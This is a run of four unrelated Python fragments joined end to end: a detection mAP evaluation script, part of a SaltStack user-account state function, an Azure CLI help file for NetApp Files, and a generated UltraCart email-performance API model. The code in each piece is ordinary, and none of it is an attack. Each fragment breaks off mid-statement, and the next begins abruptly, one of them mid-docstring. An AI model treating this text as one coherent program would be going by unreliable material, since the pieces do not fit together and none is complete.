<gh_stars>0 import glob import json import os import shutil import operator import sys import argparse import math import numpy as np from copy import deepcopy parser = argparse.ArgumentParser() parser.add_argument('-na', '--no-animation', help="no animation is shown.", action="store_true") parser.add_argument('-np', '--no-plot', help="no plot is shown.", action="store_true") parser.add_argument('-q', '--quiet', help="minimalistic console output.", action="store_true") # argparse receiving list of classes to be ignored (e.g., python main.py --ignore person book) parser.add_argument('-i', '--ignore', nargs='+', type=str, help="ignore a list of classes.") # argparse receiving list of classes with specific IoU (e.g., python main.py --set-class-iou person 0.7) parser.add_argument('--set-class-iou', nargs='+', type=str, help="set IoU for a specific class.") parser.add_argument('--classes', type=str, help='names of classes as "name1,name2" in order as in labels.txt ') parser.add_argument('--train-gt-folder', type=str, help='folder containing training labels') parser.add_argument('--log', type=str, help='just a text inserted into logs') args = parser.parse_args() ''' 0,0 ------> x (width) | | (Left,Top) | *_________ | | | | | y |_________| (height) * (Right,Bottom) ''' # if there are no classes to ignore then replace None by empty list if args.ignore is None: args.ignore = [] specific_iou_flagged = False if args.set_class_iou is not None: specific_iou_flagged = True # make sure that the cwd() is the location of the python script (so that every path makes sense) os.chdir(os.path.dirname(os.path.abspath(__file__))) GT_PATH = os.path.join(os.getcwd(), 'input', 'ground-truth') DR_PATH = os.path.join(os.getcwd(), 'input', 'detection-results') # if there are no images then no animation can be shown IMG_PATH = os.path.join(os.getcwd(), 'input', 'images-optional') if os.path.exists(IMG_PATH): for dirpath, dirnames, files in os.walk(IMG_PATH): if not files: # no image files found args.no_animation = True else: args.no_animation = True # try to import OpenCV if the user didn't choose the option --no-animation show_animation = False if not args.no_animation: try: import cv2 show_animation = True except ImportError: print("\"opencv-python\" not found, please install to visualize the results.") args.no_animation = True # try to import Matplotlib if the user didn't choose the option --no-plot draw_plot = False if not args.no_plot: try: import matplotlib.pyplot as plt draw_plot = True except ImportError: print("\"matplotlib\" not found, please install it to get the resulting plots.") args.no_plot = True def log_average_miss_rate(prec, rec, num_images): """ log-average miss rate: Calculated by averaging miss rates at 9 evenly spaced FPPI points between 10e-2 and 10e0, in log-space. output: lamr | log-average miss rate mr | miss rate fppi | false positives per image references: [1] <NAME>, et al. "Pedestrian Detection: An Evaluation of the State of the Art." Pattern Analysis and Machine Intelligence, IEEE Transactions on 34.4 (2012): 743 - 761. """ # if there were no detections of that class if prec.size == 0: lamr = 0 mr = 1 fppi = 0 return lamr, mr, fppi fppi = (1 - prec) mr = (1 - rec) fppi_tmp = np.insert(fppi, 0, -1.0) mr_tmp = np.insert(mr, 0, 1.0) # Use 9 evenly spaced reference points in log-space ref = np.logspace(-2.0, 0.0, num=9) for i, ref_i in enumerate(ref): # np.where() will always find at least 1 index, since min(ref) = 0.01 and min(fppi_tmp) = -1.0 j = np.where(fppi_tmp <= ref_i)[-1][-1] ref[i] = mr_tmp[j] # log(0) is undefined, so we use the np.maximum(1e-10, ref) lamr = math.exp(np.mean(np.log(np.maximum(1e-10, ref)))) return lamr, mr, fppi """ throw error and exit """ def error(msg): print(msg) sys.exit(0) """ check if the number is a float between 0.0 and 1.0 """ def is_float_between_0_and_1(value): try: val = float(value) if val > 0.0 and val < 1.0: return True else: return False except ValueError: return False """ Calculate the AP given the recall and precision array 1st) We compute a version of the measured precision/recall curve with precision monotonically decreasing 2nd) We compute the AP as the area under this curve by numerical integration. """ def voc_ap(rec, prec): """ --- Official matlab code VOC2012--- mrec=[0 ; rec ; 1]; mpre=[0 ; prec ; 0]; for i=numel(mpre)-1:-1:1 mpre(i)=max(mpre(i),mpre(i+1)); end i=find(mrec(2:end)~=mrec(1:end-1))+1; ap=sum((mrec(i)-mrec(i-1)).*mpre(i)); """ rec.insert(0, 0.0) # insert 0.0 at begining of list rec.append(1.0) # insert 1.0 at end of list mrec = rec[:] prec.insert(0, 0.0) # insert 0.0 at begining of list prec.append(0.0) # insert 0.0 at end of list mpre = prec[:] """ This part makes the precision monotonically decreasing (goes from the end to the beginning) matlab: for i=numel(mpre)-1:-1:1 mpre(i)=max(mpre(i),mpre(i+1)); """ # matlab indexes start in 1 but python in 0, so I have to do: # range(start=(len(mpre) - 2), end=0, step=-1) # also the python function range excludes the end, resulting in: # range(start=(len(mpre) - 2), end=-1, step=-1) for i in range(len(mpre) - 2, -1, -1): mpre[i] = max(mpre[i], mpre[i + 1]) """ This part creates a list of indexes where the recall changes matlab: i=find(mrec(2:end)~=mrec(1:end-1))+1; """ i_list = [] for i in range(1, len(mrec)): if mrec[i] != mrec[i - 1]: i_list.append(i) # if it was matlab would be i + 1 """ The Average Precision (AP) is the area under the curve (numerical integration) matlab: ap=sum((mrec(i)-mrec(i-1)).*mpre(i)); """ ap = 0.0 for i in i_list: ap += ((mrec[i] - mrec[i - 1]) * mpre[i]) return ap, mrec, mpre def compute_ap(recall, precision): """ Compute the average precision, given the recall and precision curves # Arguments recall: The recall curve (list) precision: The precision curve (list) # Returns Average precision, precision curve, recall curve """ # Append sentinel values to beginning and end mrec = np.concatenate(([0.0], recall, [1.0])) mpre = np.concatenate(([1.0], precision, [0.0])) # Compute the precision envelope mpre = np.flip(np.maximum.accumulate(np.flip(mpre))) # Integrate area under curve method = 'interp' # methods: 'continuous', 'interp' if method == 'interp': x = np.linspace(0, 1, 101) # 101-point interp (COCO) ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate else: # 'continuous' i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve return ap, mrec, mpre """ Convert the lines of a file to a list """ def file_lines_to_list(path): # open txt file lines to a list with open(path) as f: content = f.readlines() # remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] return content """ Draws text in image """ def draw_text_in_image(img, text, pos, color, line_width): font = cv2.FONT_HERSHEY_PLAIN fontScale = 1 lineType = 1 bottomLeftCornerOfText = pos cv2.putText(img, text, bottomLeftCornerOfText, font, fontScale, color, lineType) text_width, _ = cv2.getTextSize(text, font, fontScale, lineType)[0] return img, (line_width + text_width) """ Plot - adjust axes """ def adjust_axes(r, t, fig, axes): # get text width for re-scaling bb = t.get_window_extent(renderer=r) text_width_inches = bb.width / fig.dpi # get axis width in inches current_fig_width = fig.get_figwidth() new_fig_width = current_fig_width + text_width_inches propotion = new_fig_width / current_fig_width # get axis limit x_lim = axes.get_xlim() axes.set_xlim([x_lim[0], x_lim[1] * propotion]) """ Draw plot using Matplotlib """ def draw_plot_func(dictionary, n_classes, window_title, plot_title, x_label, output_path, to_show, plot_color, true_p_bar): # sort the dictionary by decreasing value, into a list of tuples sorted_dic_by_value = sorted(dictionary.items(), key=operator.itemgetter(1)) # unpacking the list of tuples into two lists sorted_keys, sorted_values = zip(*sorted_dic_by_value) # if true_p_bar != "": """ Special case to draw in: - green -> TP: True Positives (object detected and matches ground-truth) - red -> FP: False Positives (object detected but does not match ground-truth) - pink -> FN: False Negatives (object not detected but present in the ground-truth) """ fp_sorted = [] tp_sorted = [] for key in sorted_keys: fp_sorted.append(dictionary[key] - true_p_bar[key]) tp_sorted.append(true_p_bar[key]) plt.barh(range(n_classes), fp_sorted, align='center', color='crimson', label='False Positive') plt.barh(range(n_classes), tp_sorted, align='center', color='forestgreen', label='True Positive', left=fp_sorted) # add legend plt.legend(loc='lower right') """ Write number on side of bar """ fig = plt.gcf() # gcf - get current figure axes = plt.gca() r = fig.canvas.get_renderer() for i, val in enumerate(sorted_values): fp_val = fp_sorted[i] tp_val = tp_sorted[i] fp_str_val = " " + str(fp_val) tp_str_val = fp_str_val + " " + str(tp_val) # trick to paint multicolor with offset: # first paint everything and then repaint the first number t = plt.text(val, i, tp_str_val, color='forestgreen', va='center', fontweight='bold') plt.text(val, i, fp_str_val, color='crimson', va='center', fontweight='bold') if i == (len(sorted_values) - 1): # largest bar adjust_axes(r, t, fig, axes) else: plt.barh(range(n_classes), sorted_values, color=plot_color) """ Write number on side of bar """ fig = plt.gcf() # gcf - get current figure axes = plt.gca() r = fig.canvas.get_renderer() for i, val in enumerate(sorted_values): str_val = " " + str(val) # add a space
only): The below values should be specified as integers. date Date of last change of password, represented in days since epoch (January 1, 1970). mindays The minimum number of days between password changes. maxdays The maximum number of days between password changes. inactdays The number of days after a password expires before an account is locked. warndays Number of days prior to maxdays to warn users. expire Date that account expires, represented in days since epoch (January 1, 1970). The below parameters apply to windows only: win_homedrive (Windows Only) The drive letter to use for the home directory. If not specified the home directory will be a unc path. Otherwise the home directory will be mapped to the specified drive. Must be a letter followed by a colon. Because of the colon, the value must be surrounded by single quotes. ie: - win_homedrive: 'U: .. versionchanged:: 2015.8.0 win_profile (Windows Only) The custom profile directory of the user. Uses default value of underlying system if not set. .. versionchanged:: 2015.8.0 win_logonscript (Windows Only) The full path to the logon script to run when the user logs in. .. versionchanged:: 2015.8.0 win_description (Windows Only) A brief description of the purpose of the users account. .. versionchanged:: 2015.8.0 ''' # First check if a password is set. If password is set, check if # hash_password is True, then hash it. if password and hash_password: log.debug('Hashing a clear text password') password = __salt__['<PASSWORD>'](password) if fullname is not None: fullname = sdecode(fullname) if roomnumber is not None: roomnumber = sdecode(roomnumber) if workphone is not None: workphone = sdecode(workphone) if homephone is not None: homephone = sdecode(homephone) # createhome not supported on Windows or Mac if __grains__['kernel'] in ('Darwin', 'Windows'): createhome = False ret = {'name': name, 'changes': {}, 'result': True, 'comment': 'User {0} is present and up to date'.format(name)} # the comma is used to separate field in GECOS, thus resulting into # salt adding the end of fullname each time this function is called for gecos_field in ['fullname', 'roomnumber', 'workphone']: if isinstance(gecos_field, string_types) and ',' in gecos_field: ret['comment'] = "Unsupported char ',' in {0}".format(gecos_field) ret['result'] = False return ret if groups: missing_groups = [x for x in groups if not __salt__['group.info'](x)] if missing_groups: ret['comment'] = 'The following group(s) are not present: ' \ '{0}'.format(','.join(missing_groups)) ret['result'] = False return ret if optional_groups: present_optgroups = [x for x in optional_groups if __salt__['group.info'](x)] for missing_optgroup in [x for x in optional_groups if x not in present_optgroups]: log.debug('Optional group "{0}" for user "{1}" is not ' 'present'.format(missing_optgroup, name)) else: present_optgroups = None # Log a warning for all groups specified in both "groups" and # "optional_groups" lists. if groups and optional_groups: for isected in set(groups).intersection(optional_groups): log.warning('Group "{0}" specified in both groups and ' 'optional_groups for user {1}'.format(isected, name)) if gid_from_name: gid = __salt__['file.group_to_gid'](name) changes = _changes(name, uid, gid, groups, present_optgroups, remove_groups, home, createhome, password, enforce_password, empty_password, shell, fullname, roomnumber, workphone, homephone, loginclass, date, mindays, maxdays, inactdays, warndays, expire, win_homedrive, win_profile, win_logonscript, win_description) if changes: if __opts__['test']: ret['result'] = None ret['comment'] = ('The following user attributes are set to be ' 'changed:\n') for key, val in iteritems(changes): if key == 'passwd': val = 'XXX-REDACTED-XXX' elif key == 'group' and not remove_groups: key = 'ensure groups' ret['comment'] += u'{0}: {1}\n'.format(key, val) return ret # The user is present if 'shadow.info' in __salt__: lshad = __salt__['shadow.info'](name) if __grains__['kernel'] in ('OpenBSD', 'FreeBSD'): lcpre = __salt__['user.get_loginclass'](name) pre = __salt__['user.info'](name) for key, val in iteritems(changes): if key == 'passwd' and not empty_password: __salt__['shadow.set_password'](name, password) continue if key == 'passwd' and empty_password: log.warning("No password will be set when empty_password=True") continue if key == 'empty_password' and val: __salt__['shadow.del_password'](name) continue if key == 'date': __salt__['shadow.set_date'](name, date) continue # run chhome once to avoid any possible bad side-effect if key == 'home' and 'homeDoesNotExist' not in changes: if __grains__['kernel'] in ('Darwin', 'Windows'): __salt__['user.chhome'](name, val) else: __salt__['user.chhome'](name, val, persist=False) continue if key == 'homeDoesNotExist': if __grains__['kernel'] in ('Darwin', 'Windows'): __salt__['user.chhome'](name, val) else: __salt__['user.chhome'](name, val, persist=True) if not os.path.isdir(val): __salt__['file.mkdir'](val, pre['uid'], pre['gid'], 0o755) continue if key == 'mindays': __salt__['shadow.set_mindays'](name, mindays) continue if key == 'maxdays': __salt__['shadow.set_maxdays'](name, maxdays) continue if key == 'inactdays': __salt__['shadow.set_inactdays'](name, inactdays) continue if key == 'warndays': __salt__['shadow.set_warndays'](name, warndays) continue if key == 'expire': __salt__['shadow.set_expire'](name, expire) continue if key == 'win_homedrive': __salt__['user.update'](name=name, homedrive=val) continue if key == 'win_profile': __salt__['user.update'](name=name, profile=val) continue if key == 'win_logonscript': __salt__['user.update'](name=name, logonscript=val) continue if key == 'win_description': __salt__['user.update'](name=name, description=val) continue if key == 'groups': __salt__['user.ch{0}'.format(key)]( name, val, not remove_groups ) else: __salt__['user.ch{0}'.format(key)](name, val) post = __salt__['user.info'](name) spost = {} if 'shadow.info' in __salt__ and lshad['passwd'] != password: spost = __salt__['shadow.info'](name) if __grains__['kernel'] in ('OpenBSD', 'FreeBSD'): lcpost = __salt__['user.get_loginclass'](name) # See if anything changed for key in post: if post[key] != pre[key]: ret['changes'][key] = post[key] if 'shadow.info' in __salt__: for key in spost: if lshad[key] != spost[key]: if key == 'passwd': ret['changes'][key] = 'XXX-REDACTED-XXX' else: ret['changes'][key] = spost[key] if __grains__['kernel'] in ('OpenBSD', 'FreeBSD') and lcpost != lcpre: ret['changes']['loginclass'] = lcpost if ret['changes']: ret['comment'] = 'Updated user {0}'.format(name) changes = _changes(name, uid, gid, groups, present_optgroups, remove_groups, home, createhome, password, enforce_password, empty_password, shell, fullname, roomnumber, workphone, homephone, loginclass, date, mindays, maxdays, inactdays, warndays, expire, win_homedrive, win_profile, win_logonscript, win_description) if changes: ret['comment'] = 'These values could not be changed: {0}'.format( changes ) ret['result'] = False return ret if changes is False: # The user is not present, make it! if __opts__['test']: ret['result'] = None ret['comment'] = 'User {0} set to be added'.format(name) return ret if groups and present_optgroups: groups.extend(present_optgroups) elif present_optgroups: groups = present_optgroups[:] # Setup params specific to Linux and Windows to be passed to the # add.user function if not salt.utils.is_windows(): params = {'name': name, 'uid': uid, 'gid': gid, 'groups': groups, 'home': home, 'shell': shell, 'unique': unique, 'system': system, 'fullname': fullname, 'roomnumber': roomnumber, 'workphone': workphone, 'homephone': homephone, 'createhome': createhome, 'nologinit': nologinit, 'loginclass': loginclass} else: params = ({'name': name, 'password': password, 'fullname': fullname, 'description': win_description, 'groups': groups, 'home': home, 'homedrive': win_homedrive, 'profile': win_profile, 'logonscript': win_logonscript}) if __salt__['user.add'](**params): ret['comment'] = 'New user {0} created'.format(name) ret['changes'] = __salt__['user.info'](name) if not createhome: # pwd incorrectly reports presence of home ret['changes']['home'] = '' if 'shadow.info' in __salt__ \ and not salt.utils.is_windows()\ and not salt.utils.is_darwin(): if password and not empty_password: __salt__['shadow.set_password'](name, password) spost = __salt__['shadow.info'](name) if spost['passwd'] != password: ret['comment'] = 'User {0} created but failed to set' \ ' password to' \ ' {1}'.format(name, 'XXX-REDACTED-XXX') ret['result'] = False ret['changes']['password'] = 'XXX-REDACTED-XXX' if empty_password and not password: __salt__['shadow.del_password'](name) spost = __salt__['shadow.info'](name) if spost['passwd'] != '': ret['comment'] = 'User {0} created but failed to ' \ 'empty password'.format(name) ret['result'] = False ret['changes']['password'] = '' if date: __salt__['shadow.set_date'](name, date) spost = __salt__['shadow.info'](name) if spost['lstchg'] != date: ret['comment'] = 'User {0} created but failed to set' \ ' last change date to' \ ' {1}'.format(name, date) ret['result'] = False ret['changes']['date'] = date if mindays: __salt__['shadow.set_mindays'](name, mindays) spost = __salt__['shadow.info'](name) if spost['min'] != mindays: ret['comment'] = 'User {0} created but failed to set' \ ' minimum days to' \ ' {1}'.format(name, mindays) ret['result'] = False ret['changes']['mindays'] = mindays if maxdays: __salt__['shadow.set_maxdays'](name, maxdays) spost = __salt__['shadow.info'](name) if spost['max'] != maxdays: ret['comment'] = 'User {0} created but failed to set' \ ' maximum days to' \ ' {1}'.format(name, maxdays) ret['result'] = False ret['changes']['maxdays'] = maxdays if inactdays: __salt__['shadow.set_inactdays'](name, inactdays) spost = __salt__['shadow.info'](name) if spost['inact'] != inactdays: ret['comment'] = 'User {0} created but failed to set' \ ' inactive days to' \ ' {1}'.format(name, inactdays) ret['result'] = False ret['changes']['inactdays'] = inactdays if warndays: __salt__['shadow.set_warndays'](name, warndays) spost = __salt__['shadow.info'](name) if spost['warn'] != warndays: ret['comment'] = 'User {0} created but failed to set' \ ' warn days to' \ ' {1}'.format(name, warndays) ret['result'] = False ret['changes']['warndays'] = warndays if expire: __salt__['shadow.set_expire'](name, expire) spost = __salt__['shadow.info'](name) if spost['expire'] != expire: ret['comment'] = 'User {0} created but failed to set' \ '
<filename>src/netappfiles-preview/azext_netappfiles_preview/_help.py # coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from knack.help_files import helps # pylint: disable=line-too-long helps['netappfiles'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Resources. """ # account helps['netappfiles account'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Account Resources. """ helps['netappfiles account create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update). parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account examples: - name: Create an ANF account text: > az netappfiles account create -g group --account-name name -l location """ helps['netappfiles account set'] = """ type: command short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty []. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 - name: Remove the active directory from the ANF account text: > az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2 """ helps['netappfiles account update'] = """ type: command short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 """ helps['netappfiles account delete'] = """ type: command short-summary: Delete the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Delete an ANF account text: > az netappfiles account delete -g group --account-name name """ helps['netappfiles account list'] = """ type: command short-summary: List ANF accounts. examples: - name: List ANF accounts within a resource group text: > az netappfiles account list -g group """ helps['netappfiles account show'] = """ type: command short-summary: Get the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Get an ANF account text: > az netappfiles account show -g group --account-name name """ # pools helps['netappfiles pool'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Pool Resources. """ helps['netappfiles pool create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Create an ANF pool text: > az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium" """ helps['netappfiles pool update'] = """ type: command short-summary: Update the tags of the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Update specific values for an ANF pool text: > az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]' """ helps['netappfiles pool delete'] = """ type: command short-summary: Delete the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Delete an ANF pool text: > az netappfiles pool delete -g group --account-name aname --pool-name pname """ helps['netappfiles pool list'] = """ type: command short-summary: L:ist the ANF pools for the specified account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: List the pools for the ANF account text: > az netappfiles pool list -g group --account-name name """ helps['netappfiles pool show'] = """ type: command short-summary: Get the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Get an ANF pool text: > az netappfiles pool show -g group --account-name aname --pool-name pname """ # volumes helps['netappfiles volume'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Volume Resources. """ helps['netappfiles volume create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB" - name: --creation-token type: string short-summary: A unique file path identifier, from 1 to 80 characters - name: --subnet-id type: string short-summary: The subnet identifier - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A
<reponame>UltraCart/rest_api_v2_sdk_python<gh_stars>1-10 # coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 # noqa: E501 OpenAPI spec version: 2.0.0 Contact: <EMAIL> Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class EmailPerformance(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'active_customers': 'int', 'actual_customers': 'int', 'bounce_count': 'int', 'bounce_percentage': 'float', 'bounce_percentage_formatted': 'str', 'customer_histogram': 'EmailPerformanceCustomerHistogram', 'daily_stats': 'list[EmailPerformanceDaily]', 'delivered_count': 'int', 'max_active_customers': 'int', 'max_emails_per_day': 'int', 'max_emails_per_hour': 'int', 'max_emails_per_month': 'int', 'paused_for_spam': 'bool', 'revenue': 'float', 'sent_emails_per_day': 'int', 'sent_emails_per_hour': 'int', 'sent_emails_per_month': 'int', 'sequence_send_count': 'int', 'spam_count': 'int', 'spam_percentage': 'float', 'spam_percentage_formatted': 'str', 'transactional_send_count': 'int' } attribute_map = { 'active_customers': 'active_customers', 'actual_customers': 'actual_customers', 'bounce_count': 'bounce_count', 'bounce_percentage': 'bounce_percentage', 'bounce_percentage_formatted': 'bounce_percentage_formatted', 'customer_histogram': 'customer_histogram', 'daily_stats': 'daily_stats', 'delivered_count': 'delivered_count', 'max_active_customers': 'max_active_customers', 'max_emails_per_day': 'max_emails_per_day', 'max_emails_per_hour': 'max_emails_per_hour', 'max_emails_per_month': 'max_emails_per_month', 'paused_for_spam': 'paused_for_spam', 'revenue': 'revenue', 'sent_emails_per_day': 'sent_emails_per_day', 'sent_emails_per_hour': 'sent_emails_per_hour', 'sent_emails_per_month': 'sent_emails_per_month', 'sequence_send_count': 'sequence_send_count', 'spam_count': 'spam_count', 'spam_percentage': 'spam_percentage', 'spam_percentage_formatted': 'spam_percentage_formatted', 'transactional_send_count': 'transactional_send_count' } def __init__(self, active_customers=None, actual_customers=None, bounce_count=None, bounce_percentage=None, bounce_percentage_formatted=None, customer_histogram=None, daily_stats=None, delivered_count=None, max_active_customers=None, max_emails_per_day=None, max_emails_per_hour=None, max_emails_per_month=None, paused_for_spam=None, revenue=None, sent_emails_per_day=None, sent_emails_per_hour=None, sent_emails_per_month=None, sequence_send_count=None, spam_count=None, spam_percentage=None, spam_percentage_formatted=None, transactional_send_count=None): # noqa: E501 """EmailPerformance - a model defined in Swagger""" # noqa: E501 self._active_customers = None self._actual_customers = None self._bounce_count = None self._bounce_percentage = None self._bounce_percentage_formatted = None self._customer_histogram = None self._daily_stats = None self._delivered_count = None self._max_active_customers = None self._max_emails_per_day = None self._max_emails_per_hour = None self._max_emails_per_month = None self._paused_for_spam = None self._revenue = None self._sent_emails_per_day = None self._sent_emails_per_hour = None self._sent_emails_per_month = None self._sequence_send_count = None self._spam_count = None self._spam_percentage = None self._spam_percentage_formatted = None self._transactional_send_count = None self.discriminator = None if active_customers is not None: self.active_customers = active_customers if actual_customers is not None: self.actual_customers = actual_customers if bounce_count is not None: self.bounce_count = bounce_count if bounce_percentage is not None: self.bounce_percentage = bounce_percentage if bounce_percentage_formatted is not None: self.bounce_percentage_formatted = bounce_percentage_formatted if customer_histogram is not None: self.customer_histogram = customer_histogram if daily_stats is not None: self.daily_stats = daily_stats if delivered_count is not None: self.delivered_count = delivered_count if max_active_customers is not None: self.max_active_customers = max_active_customers if max_emails_per_day is not None: self.max_emails_per_day = max_emails_per_day if max_emails_per_hour is not None: self.max_emails_per_hour = max_emails_per_hour if max_emails_per_month is not None: self.max_emails_per_month = max_emails_per_month if paused_for_spam is not None: self.paused_for_spam = paused_for_spam if revenue is not None: self.revenue = revenue if sent_emails_per_day is not None: self.sent_emails_per_day = sent_emails_per_day if sent_emails_per_hour is not None: self.sent_emails_per_hour = sent_emails_per_hour if sent_emails_per_month is not None: self.sent_emails_per_month = sent_emails_per_month if sequence_send_count is not None: self.sequence_send_count = sequence_send_count if spam_count is not None: self.spam_count = spam_count if spam_percentage is not None: self.spam_percentage = spam_percentage if spam_percentage_formatted is not None: self.spam_percentage_formatted = spam_percentage_formatted if transactional_send_count is not None: self.transactional_send_count = transactional_send_count @property def active_customers(self): """Gets the active_customers of this EmailPerformance. # noqa: E501 Active customers. The value will be -1 if calculation is pending. # noqa: E501 :return: The active_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._active_customers @active_customers.setter def active_customers(self, active_customers): """Sets the active_customers of this EmailPerformance. Active customers. The value will be -1 if calculation is pending. # noqa: E501 :param active_customers: The active_customers of this EmailPerformance. # noqa: E501 :type: int """ self._active_customers = active_customers @property def actual_customers(self): """Gets the actual_customers of this EmailPerformance. # noqa: E501 Actual customers that they have regardless of active state. The value will be -1 if calculation is pending. # noqa: E501 :return: The actual_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._actual_customers @actual_customers.setter def actual_customers(self, actual_customers): """Sets the actual_customers of this EmailPerformance. Actual customers that they have regardless of active state. The value will be -1 if calculation is pending. # noqa: E501 :param actual_customers: The actual_customers of this EmailPerformance. # noqa: E501 :type: int """ self._actual_customers = actual_customers @property def bounce_count(self): """Gets the bounce_count of this EmailPerformance. # noqa: E501 Bounce count # noqa: E501 :return: The bounce_count of this EmailPerformance. # noqa: E501 :rtype: int """ return self._bounce_count @bounce_count.setter def bounce_count(self, bounce_count): """Sets the bounce_count of this EmailPerformance. Bounce count # noqa: E501 :param bounce_count: The bounce_count of this EmailPerformance. # noqa: E501 :type: int """ self._bounce_count = bounce_count @property def bounce_percentage(self): """Gets the bounce_percentage of this EmailPerformance. # noqa: E501 bounce percentage rate based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :return: The bounce_percentage of this EmailPerformance. # noqa: E501 :rtype: float """ return self._bounce_percentage @bounce_percentage.setter def bounce_percentage(self, bounce_percentage): """Sets the bounce_percentage of this EmailPerformance. bounce percentage rate based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :param bounce_percentage: The bounce_percentage of this EmailPerformance. # noqa: E501 :type: float """ self._bounce_percentage = bounce_percentage @property def bounce_percentage_formatted(self): """Gets the bounce_percentage_formatted of this EmailPerformance. # noqa: E501 bounce percentage rate (formatted) based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :return: The bounce_percentage_formatted of this EmailPerformance. # noqa: E501 :rtype: str """ return self._bounce_percentage_formatted @bounce_percentage_formatted.setter def bounce_percentage_formatted(self, bounce_percentage_formatted): """Sets the bounce_percentage_formatted of this EmailPerformance. bounce percentage rate (formatted) based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :param bounce_percentage_formatted: The bounce_percentage_formatted of this EmailPerformance. # noqa: E501 :type: str """ self._bounce_percentage_formatted = bounce_percentage_formatted @property def customer_histogram(self): """Gets the customer_histogram of this EmailPerformance. # noqa: E501 :return: The customer_histogram of this EmailPerformance. # noqa: E501 :rtype: EmailPerformanceCustomerHistogram 